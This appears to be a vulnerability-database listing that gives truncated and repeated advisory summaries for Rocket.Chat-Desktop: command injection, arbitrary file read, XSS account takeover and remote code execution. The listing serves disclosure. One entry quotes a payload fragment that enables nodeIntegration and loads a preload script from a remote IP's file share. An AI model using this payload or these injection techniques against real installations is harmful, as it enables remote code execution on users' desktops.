EUVD-2022-47508

Malicious code in bioql PyPI...

CVE-2022-44567

A command injection vulnerability exists in Rocket.Chat-Desktop 3.8.14 that could allow an attacker to pass a malicious url of openInternalVideoChatWindow to shell.openExternal, which may lead to remote code execution internalVideoChatWindow.tsL17. To exploit the vulnerability, the internal video...

CVE-2022-44567

A command injection vulnerability exists in Rocket.Chat-Desktop 3.8.14 that could allow an attacker to pass a malicious url of openInternalVideoChatWindow to shell.openExternal, which may lead to remote code execution internalVideoChatWindow.tsL17. To exploit the vulnerability, the internal video...

Command injection

A command injection vulnerability exists in Rocket.Chat-Desktop 3.8.14 that could allow an attacker to pass a malicious url of openInternalVideoChatWindow to shell.openExternal, which may lead to remote code execution internalVideoChatWindow.tsL17. To exploit the vulnerability, the internal video...

CVE-2022-44567

A command injection vulnerability exists in Rocket.Chat-Desktop 3.8.14 that could allow an attacker to pass a malicious url of openInternalVideoChatWindow to shell.openExternal, which may lead to remote code execution internalVideoChatWindow.tsL17. To exploit the vulnerability, the internal video...

CVE-2022-44567

Summary: CVE-2022-44567 affects Rocket.Chat-Desktop

Rocket.Chat: Arbitrary file read in Rocket.Chat-Desktop

Description: Rocket.Chat-Desktop is vulnerable to arbitrary file read. Releases Affected: Rocket.Chat-Desktop-Client: v3.0.0-develop Steps To Reproduce by setting up a malicious server: 1. Go to Administration » Layout » Custom Scripts » Custom Script for Logged In Users 1. Insert the following...

Rocket.Chat: Remote Code Execution in Rocket.Chat-Desktop

Description: Rocket.Chat-Desktop is vulnerable to remote code execution. An attacker is able to create new BrowserWindow instances with a malicious preload script. Releases Affected: Rocket.Chat-Desktop-Client: PWNED', '', 'nodeIntegration=true', 'preload=\\45.155.173.235\data\cmd.js'.join','...

Rocket.Chat: Account takeover via XSS

Summary: By combining AutoLinker and Markdown an attacker is able to inject malicious scripts. Description: By combining AutoLinker and Markdown we can trick the parser into breaking out of the current HTML attribute. https://a?p= results in: html ." target="blank" rel="noopener noreferrer" "...

Rocket.Chat: XSS (leads to arbitrary file read in Rocket.Chat-Desktop)

Description: Rocket.Chat allows administrative users to customize the home body. Since tags are removed, I think that running scripts should not be allowed. However, event handlers are not removed, allowing you to inject your own scripts. Releases Affected: Rocket.Chat-Desktop-Client: v2.15.5...